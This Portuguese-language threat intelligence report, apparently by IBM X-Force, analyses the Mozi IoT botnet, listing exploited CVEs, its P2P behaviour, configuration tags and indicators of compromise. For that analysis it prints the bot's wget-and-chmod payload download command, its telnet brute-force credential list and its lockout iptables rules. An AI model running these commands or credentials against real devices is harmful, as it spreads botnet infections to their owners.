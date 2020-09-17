Um player relativamente novo na área de ameaças, o botnet Mozi, disparou entre os dispositivos da Internet das Coisas (IoT), de acordo com o IBM X-Force.
Este malware está ativo desde o final de 2019 e possui código em comum com o Mirai e suas variantes. O Mozi foi responsável por quase 90% do tráfego de rede IoT observado de outubro de 2019 a junho de 2020.
Essa surpreendente aquisição foi acompanhada por um enorme aumento na atividade geral de botnets de IoT, sugerindo que o Mozi não removeu os concorrentes do mercado. Em vez disso, inundou o mercado, superando a atividade de outras variantes. No geral, o número combinado de ataques a dispositivos IoT desde outubro de 2019, quando os ataques começaram a aumentar consideravelmente, até junho de 2020, é 400% maior do que o número combinado de ataques a dispositivos IoT nos dois anos anteriores.
Esse aumento nos ataques à IoT pode ter várias causas, mas, em parte, pode ser resultado de um cenário em constante expansão para os agentes da ameaça. Existem cerca de 31 bilhões de dispositivos de IoT implementados em todo o mundo, e a taxa de implementação da IoT é atualmente de 127 dispositivos por segundo.
Os invasores estão aproveitando esses dispositivos há algum tempo, principalmente por meio da botnet Mirai. A equipe do IBM X-Force Incident Response and Intelligence Services (IRIS) faz esse acompanhamento há quase quatro anos. Então, por que o salto repentino? Pesquisas da IBM sugerem que o Mozi continua tendo sucesso, em grande parte, por meio do uso de ataques de injeção de comando (CMDi), que geralmente resultam da configuração incorreta de dispositivos de IOT. O crescimento contínuo do uso da IoT e os protocolos de configuração inadequados são os prováveis culpados por esse aumento. Esse aumento pode ter sido ainda mais impulsionado pelo acesso mais frequente às redes corporativas remotamente devido à COVID-19.
Um botnet de IoT pode ser usado para realizar ataques de distributed denial-of-service (DDoS) , roubar dados e enviar spam. Há uma infinidade de tipos diferentes de dispositivos de IOT para explorar:
Essa grande superfície de ataque deixa as organizações vulneráveis aos botnets de IoT. Some isso às falhas de segurança que esses dispositivos frequentemente apresentam logo ao sair da fábrica e às práticas de reforço de segurança pouco rigorosas durante a implementação. A vulnerabilidade mais notável na IoT ocorre por meio de ataques CMDi.
Quase todos os direcionamentos de IoT observados pela IBM tentaram usar ataques CMDi para obter acesso inicial ao dispositivo. Se o endpoint alvo fosse um dispositivo IoT e suscetível a esses ataques, a carga útil era baixada e executada.
Os ataques CMDi são extremamente populares contra dispositivos de IoT por vários motivos. Primeiro, os sistemas integrados de IoT geralmente contêm uma interface web e uma interface de depuração remanescentes do desenvolvimento de firmware que podem ser exploradas. Em segundo lugar, os módulos PHP incorporados às interfaces da IoT web podem ser explorados, fornecendo recursos de execução remota a agentes maliciosos. Em terceiro lugar, as interfaces de IoT muitas vezes ficam vulneráveis quando implementadas porque os administradores não conseguem fortalecer as interfaces limpando as entradas remotas esperadas. Isso permite que os agentes da ameaça façam input de comandos de shell, como “wget”.
Nossa análise revelou que o botnet Mozi aproveitou o CMDi usando um comando shell “wget” e alterando as permissões para permitir que o agente da ameaça interagisse com o sistema afetado. Por exemplo:
wget http://xxx.xx.xxx.xxx/bins/mozi.a -o /var/tmp/mozi.a; chmod 777 /var/tmp/mozi.a; rm -rf /var/tmp/mozi.a
Se o host estivesse vulnerável ao CMDi, esse comando faria o download e executaria um arquivo chamado "mozi.a". A análise dessa amostra específica indica que o arquivo é executado em um microprocessador sem a arquitetura de Interlocked Pipeline Stages (MIPS). Essa é uma extensão entendida por máquinas que executam a arquitetura RISC (computador com conjunto de instruções reduzido), que é predominante em muitos dispositivos de IoT. Depois que o invasor obtiver acesso total ao dispositivo por meio do botnet, o nível do firmware poderá ser alterado e malware adicional poderá ser implantado no dispositivo.
Embora este exemplo cite um vetor bem conhecido, ele pode continuar a ser eficaz por duas razões principais. Em primeiro lugar, novas vulnerabilidades permitem a atualização constante das tentativas de invasão via CMDi, e a implementação lenta de patches pode ser explorada. Em segundo lugar, essa atividade é facilmente automatizada, permitindo que o agente da ameaça atinja uma ampla gama de dispositivos de forma rápida e com baixo custo.
A infraestrutura do botnet Mozi parece ter origem principalmente na China, representando 84% da infraestrutura observada. Esse fato está alinhado com outras pesquisas de código aberto sobre a atividade da IoT em 2020.
Abaixo está uma lista de vulnerabilidades que a IBM observou que o botnet Mozi está tentando explorar:
|Vulnerabilidade
|Dispositivo afetado
|CVE-2017-17215
|Huawei HG532
|CVE-2018-10561 / CVE-2018-10562
|Roteadores GPON
|CVE-2014-8361
|Dispositivos que usam o Realtek SDK
|Roteador sem fio Eir D1000 RCI
|Roteador sem fio Eir D1000
|CVE-2008-4873
|Sepal SPBOARD
|CVE-2016-6277
|Netgear R7000 / R6400
|Netgear setup.cgi RCE não autenticado
|Netgear DGN1000
|Execução de comandos do DVR MVPower
|MVPower DVR TV-7104HE
|CVE-2015-2051
|Dispositivos D-Link
|Execução de comandos SOAP UPnP da D-Link
|Dispositivos D-Link
|Fornecedores de CCTV-DVR RCE
|Vários fornecedores de CCTV-DVR
O botnet Mozi é uma botnet peer-to-peer (P2P) baseada no protocolo Distributed Sloppy Hash Table (DSHT), que pode se espalhar por meio de exploração de IOT e senhas fracas de telnet.
Após a execução, o botnet Mozi tenta vincular a porta UDP local 14737. A amostra lê /proc/net/tcp ou /proc/net/raw para localizar e encerrar processos que usam as portas 1536 e 5888. A amostra verifica se o arquivo /usr/bin/python existe. Se existir, a amostra alterará seu nome de processo para sshd. Caso contrário, é alterado para dropbear.
Sabe-se que o botnet Mozi tem pelo menos duas características exclusivas. Ele usa o ECDSA384 (algoritmo de assinatura digital de curva elíptica 384) para verificar a sua integridade. Além disso, reutiliza partes do código do Gafgyt.
Ele contém nós públicos DHT codificados, que podem ser usados para ingressar na rede P2P. Esses nós são:
dht[.]transmissionbt[.]com:6881 router[.]bittorrent[.]com:6881 router[.]utorrent[.]com:6881 bttracker[.]debian[.]org:6881 212[.]129[.]33[.]59:6881 82[.]221[.]103[.]244:6881 130[.]239[.]18[.]159:6881 87[.]98[.]162[.]88:6881
O botnet Mozi contém quatro recursos principais. Ele pode conduzir ataques DDoS (HTTP, TCP, UDP); realizar ataque de execução de comando; fazer download de carga útil maliciosa de URL especificada e executá-la; além de coletar informações do bot.
A tabela abaixo contém detalhes importantes sobre os arquivos analisados. Os detalhes incluem tanto os arquivos submetidos quanto os arquivos residuais. (Arquivos residuais são arquivos que são extraídos de forma estática ou dinâmica durante a análise de malware.) Os dados incluem nome, categoria conforme determinado pela análise, hash e linhagem do arquivo em relação aos outros arquivos da tabela.
|Nome do arquivo
|Categoria do arquivo
|Hash do arquivo
|Linhagem
|mozi.m
|Botnet
|4dde761681684d7edad4e5e1ffdb940b
|N/D
|5738f1bc69e78d234dd04e2fbfcfb4b86403fc9117b133cf1bb7cda67e7aef0a
|Botnet
|86d42d968d3d12c36722e16c78e49ffb
|mozi.m
|mozi.a
|Botnet
|9a111588a7db15b796421bd13a949cd4
|N/D
|83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d
|Botnet
|dd4b6f3216709e193ed9f06c37bcc3890
|mozi.a
Após a execução, a amostra tenta vincular a porta UDP local 14737. A amostra lê /proc/net/tcp ou /proc/net/raw para localizar e encerrar processos que usam as portas 1536 e 5888. A amostra verifica se o arquivo /usr/bin/python existe. Se existir, a amostra alterará seu nome de processo para sshd. Caso contrário, será alterada para dropBear:
A amostra também tenta atualizar a lista de controle de acesso para bloquear SSH e telnet para evitar que outros botnets utilizem.
iptables -I INPUT -p tcp –destination-port 22 -j DROP iptables -I INPUT -p tcp –destination-port 23 -j DROP iptables -I INPUT -p tcp –destination-port 2323 -j DROP iptables -I OUTPUT -p tcp –source-port 22 -j DROP iptables -I OUTPUT -p tcp –source-port 23 -j DROP iptables -I OUTPUT -p tcp –source-port 2323 -j DROP
Também seleciona aleatoriamente portas predefinidas na iptable:
O botnet Mozi usa um protocolo DHT personalizado para desenvolver sua rede P2P. O processo de entrada de um novo nó Mozi na rede DHT é o seguinte:
dht[.]transmissionbt[.]com:6881 router[.]bittorrent[.]com:6881 router[.]utorrent[.]com:6881 bttracker[.]debian[.]org:6881 212[.]129[.]33[.]59:6881 82[.]221[.]103[.]244:6881 130[.]239[.]18[.]159:6881 87[.]98[.]162[.]88:6881
A amostra precisa gerar um ID para o nó atual. De acordo com um relatório da 360 Netlab sobre o Mozi, o “ID tem 20 bytes e consiste no prefixo 888888 incorporado na amostra ou no prefixo especificado pelo arquivo de configuração [hp], mais uma string gerada aleatoriamente”. O arquivo de configuração é mostrado abaixo:.
[ss]bot[/ss][hp]88888888[/hp][count]http[:]//ia[.]51[.]la/go1?id=19894027&pu=http%3a%2f%2fbaidu.com/[idp][/count]
Para ingressar na rede DHT, a amostra envia uma consulta ping para esses nós públicos DHT predefinidos. A consulta de ping com o ID do nó é exibida no tráfego na figura do Wireshark abaixo
Ambas as amostras são empacotadas usando um packer UPX personalizado. Ele deixa o valor de p_file_size e p_blocksize como zero na estrutura p_info.
A amostra contém um arquivo de configuração fixo, conforme mostrado abaixo:
Contém quatro seções:
Os dados de configuração são codificados usando uma chave XOR fixa, 4E665A8F80C8AC238DAC4706D54F6F7E. Os dados de configuração decodificados são mostrados abaixo:
[ss]bot[/ss][hp]88888888[/hp][count]http[:]//ia[.]51[.]la/go1?id=19894027&pu=http%3a%2f%2fbaidu.com/[idp][/count]
Os dados de configuração suportam vários comandos que são etiquetados da seguinte forma:
|Tag (Comando)
|Descrição
|[ss]
|Função de bot
|[ssx]
|ativar/desativar tag [ss]
|[cpu]
|Arquitetura da CPU
|[cpux]
|ativar/desativar tag [cpu]
|[nd]
|novo nó DHT
|[hp]
|Prefixo de hash do nó DHT
|[atk]
|Tipo de ataque DDoS
|[ver]
|Valor na seção V no protocolo DHT
|[sv]
|Atualizar configuração
|[ud]
|Atualizar bot
|[dr]
|Fazer o download e executar a carga útil da URL especificada
|[rn]
|Executar o comando especificado
|[dip]
|IP:porta para baixar o bot Mozi
|[idp]
|bot de relatório
|[count]
|URL usada para denunciar o bot
O botnet Mozi reutiliza partes do código Gafgyt no ataque DDoS. Ele suporta vários tipos de ataques DDoS, como HTTP, TCP e UDP.
A assinatura 1 do ECDSA384 é usada para verificar o valor de hash dos dados de configuração. A chave pública codificada usada para verificação é:
4C A6 FB CC F8 9B 12 1F 49 64 4D 2F 3C 17 D0 B8 E9 7D 24 24 F2 DD B1 47 E9 34 D2 C2 BF 07 AC 53 22 5F D8 92 FE ED 5F A3 C9 5B 6A 16 BE 84 40 77 88
É codificado com a chave XOR 4E665A8F80C8AC238DAC4706D54F6F7E. A chave pública decodificada é:
02 c0 a1 43 78 53 be 3c c4 c8 0a 29 e9 58 bf c6 a7 1b 7e ab 72 15 1d 64 64 98 95 c4 6a 48 c3 2d 6c 39 82 1d 7e 25 f3 80 44 f7 2d 10 6b cb 2f 09 c6
A versão de configuração determina quando atualizar o bot. Ele atualizará o bot quando esse valor for maior que seu valor atual. A assinatura 2 ECDSA384 é usada para verificar essas três primeiras partes do arquivo de configuração. A chave pública codificada usada para verificação é:
4C B3 8F 68 C1 26 70 EB 9D C1 68 4E D8 4B 7D 5F 69 5F 9D CA 8D E2 7D 63 FF AD 96 8D 18 8B 79 1B 38 31 9B 12 69 73 A9 2E B6 63 29 76 AC 2F 9E 94 A1
É codificado com a chave XOR 4E665A8F80C8AC238DAC4706D54F6F7E. A chave pública decodificada é:
02 d5 d5 e7 41 ee dc c8 10 6d 2f 48 0d 04 12 21 27 39 c7 45 0d 2a d1 40 72 01 d1 8b cd c4 16 65 76 57 c1 9d e9 bb 05 0d 3b cf 6e 70 79 60 f1 ea ef
Além das vulnerabilidades que o botnet Mozi explora para obter acesso ao dispositivo vítima, também pode forçar credenciais de telnet usando uma lista de credenciais determinada:
root admin CUAdmin default rapport super telnetadmin !!Huawei keomeo support CMCCAdmin e8telnet e8ehome1 e8ehome user mother Administrator service supervisor guest admin1 administrator 666666 888888 ubnt tech xc3511 vizxv Pon521 e2008jl r@p8p0r+ GM8182 gpon Zte521 hg2x0 epicrouter conexant xJ4pCYeW v2mprt PhrQjGzk h@32LuyD gw1admin adminpass xmhdipc juantech @HuaweiHgw adminHW 2010vesta 2011vesta plumeria0077 cat1029 123456 54321 hi3518 password 12345 fucker pass admin1234 1111 smcadmin 1234 klv123 klv1234 zte jvbzd anko zlxx 7ujMko0vizxv 7ujMko0admin system ikwb dreambox realtek 00000000 1111111 meinsm
Segue abaixo uma amostra de ataque de força bruta a uma rede Telnet:
Mozi.m e Mozi.a
Rede
dht[.]transmissionbt[.]com:6881 router[.]bittorrent[.]com:6881 router[.]utorrent[.]com:6881 bttracker[.]debian[.]org:6881 212[.]129[.]33[.]59:6881 82[.]221[.]103[.]244:6881 130[.]239[.]18[.]159:6881 87[.]98[.]162[.]88:6881
Strings notáveis (descompactadas)
8.8.8.8 /proc/net/route Mozilla/4.0 (compatível; MSIE 8.0; Windows NT 5.2; Trident/6.0) Mozilla/4.0 (compatível; MSIE 10.0; Windows NT 6.1; Trident/5.0) Mozilla/4.0 (compatível; MSIE 8.0; Windows NT 5.1; pl) Opera 11.00 Mozilla/4.0 (compatível; MSIE 8.0; Windows NT 6.0; en) Opera 11.00 Mozilla/4.0 (compatível; MSIE 8.0; Windows NT 6.0; ja) Opera 11.00 Mozilla/4.0 (compatível; MSIE 8.0; Windows NT 6.1; de) Opera 11.01 Mozilla/4.0 (compatível; MSIE 8.0; Windows NT 6.1; fr) Opera 11.00 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, como Gecko) Chrome/50.0.2661.102 Safari/537.36 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, como Gecko) Chrome/51.0.2704.79 Safari/537.36 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0 Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, como Gecko) Versão/8.0 Mobile/12H143 Safari/600.1.4 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, como Gecko) Chrome/45.0.2454.101 Safari/537.36 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, como Gecko) Chrome/46.0.2490.80 Safari/537.36 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.56 (KHTML, como Gecko) Versão/9.0 Safari/601.1.56 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, como Gecko) Versão/9.0.1 Safari/601.2.7 Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) como Gecko Mozilla/4.0 (compatível; MSIE 6.1; Windows XP) Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Versão/10.51 Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Versão/12.16 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, como Gecko) Versão/7.0.3 Safari/7046A194A Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, como Gecko) Chrome/50.0.2661.102 Safari/537.36 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, como Gecko) Chrome/50.0.2661.94 Safari/537.36 Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, como Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36 Mozilla/5.0 (Linux; Android 4.4.3; HTC_0PCV2 Build/KTU84L) AppleWebKit/537.36 (KHTML, como Gecko) Versão/4.0 Chrome/33.0.0.0 Mobile Safari/537.36 Mozilla/4.0 (compatível; MSIE 8.0; X11; Linux x86_64; pl) Opera 11.00 Mozilla/4.0 (compatível; MSIE 9.0; Windows 98; .NET CLR 3.0.04506.30) Mozilla/4.0 (compatível; MSIE 9.0; Windows NT 5.1; Trident/5.0) Mozilla/4.0 (compatível; MSIE 9.0; Windows NT 6.0; Trident/4.0; GTB7.4; InfoPath.3; SV1; .NET CLR 3.4.53360; WOW64; en-US) Mozilla/4.0 (compatível; MSIE 9.0; Windows NT 6.1; Trident/4.0; FDM; MSIECrawler; Media Center PC 5.0) Mozilla/4.0 (compatível; MSIE 9.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 4.4.58799; WOW64; en-US) Mozilla/4.0 (compatível; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts) Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0 GET HEAD POST ./config /tmp/config cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL “http://127.0.0.1″>http://127.0.0.1” cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword “acsMozi” iptables -I INPUT -p tcp –destination-port 35000 -j DROP iptables -I INPUT -p tcp –destination-port 50023 -j DROP iptables -I OUTPUT -p tcp –source-port 50023 -j DROP iptables -I OUTPUT -p tcp –source-port 35000 -j DROP iptables -I INPUT -p tcp –destination-port 7547 -j DROP iptables -I OUTPUT -p tcp –source-port 7547 -j DROP [cpux] [/cpux] [cpu] [/cpu] [ssx] [/ssx] [ss] [/ss] none [sv] [/sv] [rn] [/rn] run: [nd] [/nd] /tmp /var /temp iptables -I INPUT -p udp –destination-port %d -j ACCEPT iptables -I OUTPUT -p udp –source-port %d -j ACCEPT iptables -I PREROUTING -t nat -p udp –destination-port %d -j ACCEPT iptables -I POSTROUTING -t nat -p udp –source-port %d -j ACCEPT 0.0.0.0 [idp] Esse nó não aceita announces dht.transmissionbt.com:6881 router.bittorrent.com:6881 router.utorrent.com:6881 bttracker.debian.org:6881 212.129.33.59:6881 82.221.103.244:6881 130.239.18.159:6881 87.98.162.88:6881
O cenário de botnets de IOT continua mudando, e os dados da IBM sugerem que os agentes de ameaça permanecem ativos nesse espaço. Com o aumento das operações de novos grupos de botnets, como o Mozi, e o crescimento da atividade geral da IoT, as organizações que utilizam dispositivos de IoT precisam estar atentas à evolução dessa ameaça. A IBM tem observado um aumento no número de ataques a dispositivos IoT corporativos. A injeção de comando continua sendo o principal vetor de infecção preferido dos agentes da ameaça, reiterando a importância de alterar as configurações padrão do dispositivo e usar testes de penetração para encontrar e fazer correções nas lacunas de blindagem.
Metadados do Mozi.m
|Nome do arquivo:
|Mozi.m
|Tamanho do arquivo:
|108.808
|MD5:
|4dde761681684d7edad4e5e1ffdb940b
|SHA1:
|2327be693bc11a618c380d7d3abc2382d870d48b
|SHA256:
|d546509ab6670f9ff31783ed72875dfc0f37fa2b666bd5870eecaaed2ebea4a8
|Tipo de arquivo:
|Executável ELF de 32 bits MSB, MIPS, MIPS-I versão 1 (SYSV), vinculado estaticamente, sem formatação
|Categoria:
|Botnet
|Nome IRIS:
|Mozi
|Outros nomes:
Metadados do Mozi.a
|Nome do arquivo:
|Mozi.a
|Tamanho do arquivo:
|95.268
|MD5:
|9a111588a7db15b796421bd13a949cd4
|SHA1:
|034c8c51a58be11ca620ce3eb0d43d5a59275d2f
|SHA256:
|e15e93db3ce3a8a22adb4b18e0e37b93f39c495e4a97008f9b1a9a42e1fac2b0
|Tipo de arquivo:
|Executável ELF de 32 bits LSB, ARM, versão 1, vinculado estaticamente, sem formatação
|Categoria:
|Botnet
|Nome IRIS:
|Mozi
|Outros nomes:
5738f1bc69e78d234dd04e2fbfcfb4b86403fc9117b133cf1bb7cda67e7aef0a Metadados
|Nome do arquivo:
|d546_unpacked
|Tamanho do arquivo:
|266.108
|MD5:
|86d42d968d3d12c36722e16c78e49ffb
|SHA1:
|ba733ab3bfc6b4afcf784f95aa9bee99fb665a71
|SHA256:
|5738f1bc69e78d234dd04e2fbfcfb4b86403fc9117b133cf1bb7cda67e7aef0a
|Tipo de arquivo:
|Executável ELF de 32 bits MSB, MIPS, MIPS-I versão 1 (SYSV), vinculado estaticamente, sem formatação
|Categoria:
|Botnet
|Nome IRIS:
|Mozi
|Outros nomes:
83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d Metadados
|Nome do arquivo:
|83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d
|Tamanho do arquivo:
|212.464
|MD5:
|dd4b6f3216709e193ed9f06c37bcc389
|SHA1:
|758ba1ab22dd37f0f9d6fd09419bfef44f810345
|SHA256:
|83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d
|Tipo de arquivo:
|b'ELF 32-bit LSB executável, ARM, versão 1, vinculado estaticamente, sem formatação'
|Categoria:
|Botnet
|Nome IRIS:
|Mozi
|Outros nomes: